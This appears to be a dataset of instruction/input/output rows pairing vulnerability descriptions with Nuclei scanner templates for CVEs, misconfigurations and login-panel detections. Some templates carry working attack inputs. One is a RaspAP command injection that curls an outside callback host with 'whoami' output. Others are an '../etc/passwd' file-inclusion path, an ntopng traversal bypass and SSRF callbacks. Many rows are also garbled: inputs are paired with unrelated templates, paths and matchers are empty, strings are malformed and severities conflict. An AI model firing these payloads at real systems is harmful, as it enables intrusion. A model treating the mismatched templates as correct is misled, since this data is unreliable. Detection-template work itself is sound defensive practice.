instruction
stringlengths
41
188
input
stringlengths
165
3.12k
output
stringlengths
256
2.26M
category
stringclasses
3 values
severity
stringclasses
5 values
id
stringlengths
5
54
Generate a Nuclei template for CVE-2020-11710
Title: Unknown Vulnerability in konghq docker-kong Summary: An issue was discovered in docker-kong (for Kong) through 2.0.3. The admin API port may be accessible on interfaces other than 127.0.0.1. NOTE: The vendor argue that this CVE is not a vulnerability because it has an inaccurate bug scope and patch links. “1) Inaccurate Bug Scope - The issue scope was on Kong's docker-compose template, and not Kong's docker image itself. In reality, this issue is not associated with any version of the Kong gateway. As such, the description stating ‘An issue was discovered in docker-kong (for Kong) through 2.0.3.’ is incorrect. This issue only occurs if a user decided to spin up Kong via docker-compose without following the security documentation. The docker-compose template is meant for users to quickly get started with Kong, and is meant for development purposes only. 2) Incorrect Patch Links - The CVE currently points to a documentation improvement as a “Patch” link: https://github.com/Kong/docs.konghq.com/commit/d693827c32144943a2f45abc017c1321b33ff611.This link actually points to an improvement Kong Inc made for fool-proofing. However, instructions for how to protect the admin API were already well-documented here: https://docs.konghq.com/2.0.x/secure-admin-api/#network-layer-access-restrictions , which was first published back in 2017 (as shown in this commit: https://github.com/Kong/docs.konghq.com/commit/e99cf875d875dd84fdb751079ac37882c9972949) Lastly, the hyperlink to https://github.com/Kong/kong (an unrelated Github Repo to this issue) on the Hyperlink list does not include any meaningful information on this topic. Vulnerability Type: Unknown Vulnerability Severity: critical Affected Products: konghq docker-kong Indicators: error, vulnerability detected
id: CVE-2020-11710 info: name: Kong Admin <=2.03 - Admin API Access author: pikpikcu severity: critical description: Kong Admin through 2.0.3 contains an issue via docker-kong which makes the admin API port accessible on interfaces other than 127.0.0.1. tags: cve,cve2020,kong,konghq,vuln http: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/admin/" matchers: - type: word words: - "Welcome to kong" - "configuration" - "kong_env" part: body condition: and - type: status status: - 200
cve
critical
CVE-2020-11710
Generate a Nuclei template for: Detect Springboot Trace Actuator
Title: Detect Springboot Trace Actuator Summary: Detect Springboot Trace Actuator. View recent HTTP requests and responses Vulnerability Type: Security Check Severity: low Indicators: vulnerability detected
id: springboot-trace info: name: Detect Springboot Trace Actuator author: that_juan_,dwisiswant0,wdahlenb severity: low description: View recent HTTP requests and responses tags: misconfig,springboot,exposure,vuln http: - method: GET path: - "{{BaseURL}}/trace" matchers: - type: word words: - ""timestamp"" - ""info"" - ""method"" - ""path"" part: body condition: and - type: word words: - "application/json" - "application/vnd.spring-boot.actuator" - "application/vnd.spring-boot.actuator.v1+json" - "application/vnd.spring-boot.actuator.v2+json" - "application/vnd.spring-boot.actuator.v3+json" part: header condition: or - type: status status: - 200
generic
low
springboot-trace
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: hackster info: name: Hackster User Name Information - Detect author: dwisiswant0 severity: info description: Hackster user name information check was conducted. tags: osint,osint-coding,hackster,discovery http: - method: GET path: - "https://www.hackster.io/{{user}}" matchers: - type: status status: - 200 - type: word words: - "- Hackster.io" part: body
cwe
medium
CWE-200
Generate a Nuclei template for: Azure PostgreSQL Log Disconnections Not Enabled
Title: Azure PostgreSQL Log Disconnections Not Enabled Summary: Azure PostgreSQL Log Disconnections Not Enabled. Ensure that the "log_disconnections" server parameter is enabled for all PostgreSQL database servers provisioned in your Microsoft Azure cloud account. The "log_disconnections" parameter enables the logging of session termination. The log output provides information similar to the one generated by the "log_connections" parameter, plus the duration of the session. Only Azure account admins can change this parameter at the session start, and it cann Vulnerability Type: Security Check Severity: medium Indicators: vulnerability detected
id: azure-postgres-log-disconnections-disabled info: name: Azure PostgreSQL Log Disconnections Not Enabled author: princechaddha severity: medium description: Ensure that the "log_disconnections" server parameter is enabled for all PostgreSQL database servers provisioned in your Microsoft Azure cloud account. The "log_disconnections" parameter enables the logging of session termination. The log output provides information similar to the one generated by the "log_connections" parameter, plus the duration of the session. Only Azure account admins can change this parameter at the session start, and it cannot be changed at all during a session. tags: cloud,devops,azure,microsoft,postgresql,azure-cloud-config http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
medium
azure-postgres-log-disconnections-disabled
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: workspace-one-uem info: name: VMware Workspace ONE UEM Airwatch Login Panel - Detect author: gevakun,hanlaomo severity: info description: VMware Workspace ONE UEM Airwatch login panel was detected. tags: panel,workspaceone,vmware,discovery http: - method: GET path: - "{{BaseURL}}/AirWatch/Login" matchers: - type: word words: - "About VMware AirWatch" - "content="AirWatch" - "/AirWatch/Images" part: body condition: or
cwe
medium
CWE-200
Generate a Nuclei template for: Jolokia - Searching MBeans
Title: Jolokia - Searching MBeans Summary: Jolokia - Searching MBeans. Unauth users can search Mbeans in Jolokia. Vulnerability Type: Security Check Severity: low Indicators: vulnerability detected
id: jolokia-mbean-search info: name: Jolokia - Searching MBeans author: pussycat0x severity: low description: Unauth users can search Mbeans in Jolokia. tags: jolokia,springboot,mbean,tomcat,misconfig,vuln http: - method: GET path: - "{{BaseURL}}/jolokia/search/*:test=test" - "{{BaseURL}}/actuator/jolokia/search/*:test=test" matchers: - type: status status: - 200 - type: word words: - ""type":"search"" - ""value":" part: body condition: and
generic
low
jolokia-mbean-search
Generate a Nuclei template for: Vaultwarden Login Panel - Detect
Title: Vaultwarden Login Panel - Detect Summary: Vaultwarden Login Panel - Detect. Vaultwarden products was detected. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: vaultwarden-panel info: name: Vaultwarden Login Panel - Detect author: righettod severity: info description: Vaultwarden products was detected. tags: panel,vaultwarden,login,discovery http: - method: GET path: - "{{BaseURL}}/#/login" matchers: - type: dsl condition: and
generic
info
vaultwarden-panel
Generate a Nuclei template for: MySQL - Default Login
Title: MySQL - Default Login Summary: MySQL - Default Login. A MySQL service was accessed with easily guessed credentials. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: mysql-default-login info: name: MySQL - Default Login author: DhiyaneshDk,pussycat0x,ritikchaddha severity: high description: A MySQL service was accessed with easily guessed credentials. tags: js,mysql,default-login,network,fuzz,enum,vuln http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
high
mysql-default-login
Generate a Nuclei template for: Umami Panel - Detect
Title: Umami Panel - Detect Summary: Umami Panel - Detect. simple, fast, privacy-focused, open-source analytics solution. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: umami-panel info: name: Umami Panel - Detect author: userdehghani severity: info description: simple, fast, privacy-focused, open-source analytics solution. tags: panel,umami,login,detect,discovery http: - method: GET path: - "{{BaseURL}}/login" - "{{BaseURL}}/favicon.ico" matchers: - type: dsl condition: or - method: GET path: - "{{BaseURL}}/~404" matchers: - type: status status: - 200
generic
info
umami-panel
Generate a Nuclei template for: SEO King - Shopify App — Installer
Title: SEO King - Shopify App — Installer Summary: SEO King - Shopify App — Installer. Shopify App is susceptible to the Installation page exposure due to misconfiguration. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: shopify-app-installer info: name: SEO King - Shopify App — Installer author: tess severity: info description: Shopify App is susceptible to the Installation page exposure due to misconfiguration. tags: misconfig,shopify,install,vuln http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "Shopify App — Installation" - "example.myshopify.com" part: body condition: and - type: status status: - 200
generic
info
shopify-app-installer
Generate a Nuclei template for CVE-2024-29059
Title: Vulnerability (CWE-209) in microsoft .net_framework Summary: .NET Framework Information Disclosure Vulnerability Vulnerability Type: Vulnerability (CWE-209) Severity: high Affected Products: microsoft .net_framework Indicators: error, vulnerability detected
id: CVE-2024-29059 info: name: .NET Framework - Leaking ObjRefs via HTTP .NET Remoting author: iamnoooob,rootxharsh,DhiyaneshDk,pdresearch severity: high description: .NET Framework Information Disclosure Vulnerability tags: cve,cve2024,dotnet,microsoft,remoting,deserialization,kev,vkev,vuln http: - method: GET path: matchers: - type: dsl condition: and
cve
high
CVE-2024-29059
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: lichess info: name: Lichess User Name Information - Detect author: dwisiswant0 severity: info description: Lichess user name information check was conducted. tags: osint,osint-gaming,lichess,discovery http: - method: GET path: - "https://lichess.org/@/{{user}}" matchers: - type: status status: - 200 - type: word words: - "Activity" part: body
cwe
medium
CWE-200
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: epmp-login info: name: ePMP 2000 Login Panel - Detect author: dhiyaneshDk severity: info description: ePMP 2000 login panel was detected. tags: panel,edb,iot,discovery http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "<title>ePMP</title>" part: body - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template for CVE-2023-26802
Title: Path Traversal in dcnglobal dcbi-netlog-lab_firmware Summary: An issue in the component /network_config/nsg_masq.cgi of DCN (Digital China Networks) DCBI-Netlog-LAB v1.0 allows attackers to bypass authentication and execute arbitrary commands via a crafted request. Vulnerability Type: Path Traversal Severity: critical Affected Products: dcnglobal dcbi-netlog-lab_firmware Indicators: error, vulnerability detected
id: CVE-2023-26802 info: name: DCBI-Netlog-LAB v1.0 - Command Injection author: pussycat0x severity: critical description: An issue in the component /network_config/nsg_masq.cgi of DCN (Digital China Networks) DCBI-Netlog-LAB v1.0 allows attackers to bypass authentication and execute arbitrary commands via a crafted request. tags: cve,cve2023,rce,unauth,netlog,vkev,vuln http: - method: GET path: matchers: - type: word words: - "nsg_bridge.cgi" - "nsg_dhcpactiveip.cgi" part: body_2 condition: and - type: status status: - 200
cve
critical
CVE-2023-26802
Generate a Nuclei template for: dizqueTV - Detect
Title: dizqueTV - Detect Summary: dizqueTV - Detect. An instance running dizqueTV was detected. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: dizquetv-detect info: name: dizqueTV - Detect author: s4e-io severity: info description: An instance running dizqueTV was detected. tags: dizquetv,tech,detect,discovery http: - method: GET path: - "{{BaseURL}}" matchers: - type: dsl condition: and
generic
info
dizquetv-detect
Generate a Nuclei template for: Apache YARN ResourceManager Panel - Detect
Title: Apache YARN ResourceManager Panel - Detect Summary: Apache YARN ResourceManager Panel - Detect. Apache YARN ResourceManager panel was detected. Vulnerability Type: Security Check Severity: low Indicators: vulnerability detected
id: yarn-manager-exposure info: name: Apache YARN ResourceManager Panel - Detect author: pdteam severity: low description: Apache YARN ResourceManager panel was detected. tags: panel,apache,yarn,exposure,discovery http: - method: GET path: - "{{BaseURL}}/cluster/cluster" matchers: - type: word words: - "hadoop" - "resourcemanager" - "logged in as: dr.who" condition: and
generic
low
yarn-manager-exposure
Generate a Nuclei template for: RD Web Access Panel - Detect
Title: RD Web Access Panel - Detect Summary: RD Web Access Panel - Detect. RD web access panel was discovered. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: rdweb-panel info: name: RD Web Access Panel - Detect author: rxerium,sorrowx3 severity: info description: RD web access panel was discovered. tags: panel,login,rdp,web-access,Microsoft,detect,microsoft,discovery http: - method: GET path: - "{{BaseURL}}/RDWeb/" matchers: - type: word words: - "TSWAFeatureCheckCookie=true; path=/RDWeb/" part: header - type: word words: - "<rdp-client-top-view>" - "Microsoft Remote Desktop" part: response condition: and
generic
info
rdweb-panel
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: discourse info: name: Discourse User Name Information - Detect author: dwisiswant0 severity: info description: Discourse user name information check was conducted. tags: osint,osint-misc,discourse,discovery http: - method: GET path: - "https://meta.discourse.org/u/{{user}}/summary.json" matchers: - type: status status: - 200 - type: word words: - "topics" part: body
cwe
medium
CWE-200
Generate a Nuclei template for: Bonita Portal Login - Detect
Title: Bonita Portal Login - Detect Summary: Bonita Portal Login - Detect. Detects the presence of Bonita Portal login page. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: bonita-portal-panel info: name: Bonita Portal Login - Detect author: DhiyaneshDK severity: info description: Detects the presence of Bonita Portal login page. tags: bonita,login,panel,discovery http: - method: GET path: - "{{BaseURL}}/bonita/login.jsp" matchers: - type: word words: - "Bonita Portal" - type: status status: - 200
generic
info
bonita-portal-panel
Generate a Nuclei template for CVE-2009-3053
Title: Path Traversal in jvitals com_agora Summary: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php. Vulnerability Type: Path Traversal Severity: medium Affected Products: jvitals com_agora Indicators: error, vulnerability detected
id: CVE-2009-3053 info: name: Joomla! Agora 3.0.0b - Local File Inclusion author: daffainfo severity: medium description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php. tags: cve2009,cve,joomla,lfi,edb,vuln http: - method: GET path: - "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd" matchers: - type: regex - type: status status: - 200
cve
medium
CVE-2009-3053
Generate a Nuclei template for CVE-2021-33357
Title: OS Command Injection in raspap raspap Summary: A vulnerability exists in RaspAP 2.6 to 2.6.5 in the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";" which enables an unauthenticated attacker to execute arbitrary OS commands. Vulnerability Type: OS Command Injection Severity: critical Affected Products: raspap raspap Indicators: error, vulnerability detected
id: CVE-2021-33357 info: name: RaspAP <=2.6.5 - Remote Command Injection author: pikpikcu,pdteam severity: critical description: RaspAP 2.6 to 2.6.5 allows unauthenticated attackers to execute arbitrary OS commands via the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";". tags: cve2021,cve,rce,raspap,oast,vkev,vuln http: - method: GET path: - "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;" matchers: - type: word words: - "http" part: interactsh_protocol - type: word words: - "DHCPEnabled"
cve
critical
CVE-2021-33357
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: sap-successfactors-detect info: name: SAP SuccessFactors Login Panel - Detect author: tess severity: info description: SAP SuccessFactors login panel was detected. tags: panel,sap,detect,discovery http: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/sf/start" matchers: - type: word words: - "SAP SuccessFactors" - "sap-ui-core" part: body condition: and - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template for CVE-2025-25034
Title: Deserialization of Untrusted Data in CVE-2025-25034 Summary: A PHP object injection vulnerability exists in SugarCRM versions prior to 6.5.24, 6.7.13, 7.5.2.5, 7.6.2.2, and 7.7.1.0 due to improper validation of PHP serialized input in the SugarRestSerialize.php script. The vulnerable code fails to sanitize the rest_data parameter before passing it to the unserialize() function. This allows an unauthenticated attacker to submit crafted serialized data containing malicious object declarations, resulting in arbitrary code execution within the application context. Although SugarCRM released a prior fix in advisory sugarcrm-sa-2016-001, the patch was incomplete and failed to address some vectors. Vulnerability Type: Deserialization of Untrusted Data Severity: medium Indicators: failed
id: CVE-2025-25034 info: name: SugarCRM - Unauthenticated Remote Code Execution via PHP Object Injection author: Redmomn severity: critical description: A PHP object injection vulnerability exists in SugarCRM versions prior to 6.5.24, 6.7.13, 7.5.2.5, 7.6.2.2, and 7.7.1.0 due to improper validation of PHP serialized input in the SugarRestSerialize.php script. The vulnerable code fails to sanitize the rest_data parameter before passing it to the unserialize() function. This allows an unauthenticated attacker to submit crafted serialized data containing malicious object declarations, resulting in arbitrary code execution within the application context. Although SugarCRM released a prior fix in advisory sugarcrm-sa-2016-001, the patch was incomplete and failed to address some vectors. tags: cve,cve2025,sugarcrm,rce,php,deserialization,unauth,vkev,vuln http: - method: GET path: matchers: - type: dsl condition: and - method: GET path: matchers: - type: dsl condition: and
cve
medium
CVE-2025-25034
Generate a Nuclei template for: ThinkPHP 5.0.23 - Remote Code Execution
Title: ThinkPHP 5.0.23 - Remote Code Execution Summary: ThinkPHP 5.0.23 - Remote Code Execution. ThinkPHP 5.0.23 is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Vulnerability Type: Security Check Severity: critical Indicators: vulnerability detected
id: thinkphp-5023-rce info: name: ThinkPHP 5.0.23 - Remote Code Execution author: dr_set severity: critical description: ThinkPHP 5.0.23 is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. tags: thinkphp,rce,vuln http: - method: POST path: - "{{BaseURL}}/index.php?s=captcha" matchers: - type: word words: - "PHP Extension" - "PHP Version" - "ThinkPHP" condition: and - type: status status: - 200
generic
critical
thinkphp-5023-rce
Generate a Nuclei template for: Pinata API Key - Expose
Title: Pinata API Key - Expose Summary: Pinata API Key - Expose. Tags: pinata, exposure, api-keys Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: pinata-api-key info: name: Pinata API Key - Expose author: 0xpugal severity: info description: Pinata API Key - Expose tags: pinata,exposure,api-keys,tokens,vuln http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "pinata_api_key" - "pinata_api_secret" - "pinataKey" - "pinataSecret" - "pinata-key" - "pinata_secret" condition: or
generic
info
pinata-api-key
Generate a Nuclei template for CVE-2023-30019
Title: Vulnerability (CWE-918) in evilmartians imgproxy Summary: imgproxy <=3.14.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter. Vulnerability Type: Vulnerability (CWE-918) Severity: medium Affected Products: evilmartians imgproxy Indicators: error, vulnerability detected
id: CVE-2023-30019 info: name: Imgproxy <= 3.14.0 - Server-side request forgery (SSRF) author: DhiyaneshDK severity: medium description: imgproxy <=3.14.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter. tags: cve,cve2023,imgproxy,ssrf,oast,evilmartians,vuln http: - method: GET path: - "{{BaseURL}}/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}" matchers: - type: word words: - "Invalid source image" - type: status status: - 422
cve
medium
CVE-2023-30019
Generate a Nuclei template for CVE-2017-8046
Title: Vulnerability (CWE-20) in vmware spring_boot and others Summary: Malicious PATCH requests submitted to servers using Spring Data REST versions prior to 2.6.9 (Ingalls SR9), versions prior to 3.0.1 (Kay SR1) and Spring Boot versions prior to 1.5.9, 2.0 M6 can use specially crafted JSON data to run arbitrary Java code. Vulnerability Type: Vulnerability (CWE-20) Severity: critical Affected Products: vmware spring_boot, pivotal_software spring_data_rest Indicators: error, vulnerability detected
id: CVE-2017-8046 info: name: Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution author: domwhewell-sage severity: critical description: Spring Data REST < 2.6.9 and 3.0.1, Spring Boot < 1.5.9 and 2.0 M6 contain a remote code execution caused by processing malicious PATCH requests with crafted JSON data, letting attackers execute arbitrary Java code, exploit requires sending malicious PATCH requests. tags: cve,cve2017,pivotal,springboot,pivotal_software,vkev,vuln http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "application/json" - "application/hal+json" - "application/vnd.spring-boot.actuator" part: header condition: or - type: word words: - ""_embedded"" - ""_links"" - ""page"" - ""size"" part: body condition: or - method: PATCH path: - "{{endpoint}}/1" matchers: - type: word words: - "dns" part: interactsh_protocol - type: word words: - "org.springframework" part: body
cve
critical
CVE-2017-8046
Generate a Nuclei template for CVE-2020-12256
Title: Cross-Site Scripting (XSS) in rconfig rconfig Summary: rConfig 3.9.4 is vulnerable to reflected XSS. The devicemgmnt.php file improperly validates user input. An attacker can exploit this by crafting arbitrary JavaScript in the deviceId GET parameter to devicemgmnt.php. Vulnerability Type: Cross-Site Scripting (XSS) Severity: medium Affected Products: rconfig rconfig Indicators: error, vulnerability detected
id: CVE-2020-12256 info: name: rConfig 3.9.4 - Cross-Site Scripting author: r3Y3r53 severity: medium description: The rConfig 3.9.4 is vulnerable to cross-site scripting. The devicemgmnt.php file improperly validates the request coming from the user input. Due to this flaw, An attacker can exploit this vulnerability by crafting arbitrary javascript in `deviceId` GET parameter of devicemgmnt.php resulting in execution of the javascript. tags: cve,cve2020,rconfig,authenticated,xss,vuln http: - method: GET path: matchers: - type: dsl condition: and
cve
medium
CVE-2020-12256
Generate a Nuclei template for CVE-2022-43167
Title: Cross-Site Scripting (XSS) in rukovoditel rukovoditel Summary: A stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add". Vulnerability Type: Cross-Site Scripting (XSS) Severity: medium Affected Products: rukovoditel rukovoditel Indicators: error, vulnerability detected
id: CVE-2022-43167 info: name: Rukovoditel <= 3.2.1 - Cross Site Scripting author: r3Y3r53 severity: medium description: A stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add". tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,vuln http: - method: GET path: matchers: - type: dsl condition: and
cve
medium
CVE-2022-43167
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: ems-login-panel info: name: EMS Login Panel - Detect author: __Fazal severity: info description: EMS login panel was detected. tags: panel,ems,login,discovery http: - method: GET path: - "{{BaseURL}}/EMSWebClient/Login.aspx" matchers: - type: status status: - 200 - type: word words: - "EMS Web Client - Login"
cwe
medium
CWE-200
Generate a Nuclei template for CVE-2021-27573
Title: Missing Authorization in remotemouse emote_remote_mouse Summary: An issue was discovered in Emote Remote Mouse through 4.0.0.0. Remote unauthenticated users can execute arbitrary code via crafted UDP packets with no prior authorization or authentication. Vulnerability Type: Missing Authorization Severity: critical Affected Products: remotemouse emote_remote_mouse Indicators: error, vulnerability detected
id: CVE-2021-28073 info: name: Ntopng Authentication Bypass author: z3bd severity: critical description: Ntopng, a passive network monitoring tool, contains an authentication bypass vulnerability in ntopng <= 4.2 tags: cve2021,cve,ntopng,vuln http: - method: GET path: - "{{BaseURL}}/lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css" - "{{BaseURL}}/lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css" matchers: - type: word words: - "application/json" part: header - type: word words: - ""results":" - ""name":" - ""tab":" condition: and - type: status status: - 200
cve
critical
CVE-2021-27573
Generate a Nuclei template for CVE-2023-5974
Title: Vulnerability (CWE-918) in wpb_show_core_project wpb_show_core Summary: The WPB Show Core WordPress plugin through 2.2 is vulnerable to server-side request forgery (SSRF) via the `path` parameter. Vulnerability Type: Vulnerability (CWE-918) Severity: critical Affected Products: wpb_show_core_project wpb_show_core Indicators: error, vulnerability detected
id: CVE-2023-5974 info: name: WordPress WPB Show Core <= 2.2 - Server-Side Request Forgery author: ritikchaddha severity: critical description: The WPB Show Core WordPress plugin through version 2.2 is vulnerable to Server-Side Request Forgery (SSRF) via the 'path' parameter in the download-file.php script. This vulnerability allows unauthenticated attackers to make the server perform requests to arbitrary URLs. tags: cve,cve2023,wp,wordpress,wp-plugin,ssrf,wpb-show-core,oast,vuln http: - method: GET path: matchers: - type: word words: - "wpb-show-core" part: body - method: GET path: matchers: - type: word words: - "http" part: interactsh_protocol
cve
critical
CVE-2023-5974
Generate a Nuclei template for: Ensure audit-log-path set
Title: Ensure audit-log-path set Summary: Ensure audit-log-path set. Checks if the audit-log-path argument is properly set in the Kubernetes API server configuration, which is essential for maintaining a reliable audit trail. Vulnerability Type: Security Check Severity: medium Indicators: vulnerability detected
id: audit-log-path-set info: name: Ensure audit-log-path set author: princechaddha severity: medium description: Checks if the audit-log-path argument is properly set in the Kubernetes API server configuration, which is essential for maintaining a reliable audit trail. tags: cloud,devops,kubernetes,devsecops,api-server,k8s,k8s-cluster-security http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
medium
audit-log-path-set
Generate a Nuclei template for CVE-2018-1207
Title: Code Injection in dell emc_idrac7 and others Summary: Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain CGI injection vulnerability which could be used to execute remote code. A remote unauthenticated attacker may potentially be able to use CGI variables to execute remote code. Vulnerability Type: Code Injection Severity: critical Affected Products: dell emc_idrac7, dell emc_idrac8 Indicators: error, vulnerability detected
id: dell-idrac-workflow info: name: Dell iDRAC Security Checks author: kophjager007,megamansec severity: info description: A workflow to identify Dell iDRAC instances and run all related nuclei templates. tags: unknown http: - method: GET path: - "/" matchers: - type: status status: - 200
cve
critical
CVE-2018-1207
Generate a Nuclei template for: Turla APT Malware - Detect
Title: Turla APT Malware - Detect Summary: Turla APT Malware - Detect. Detects Turla malware based on sample used in the RUAG APT case Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
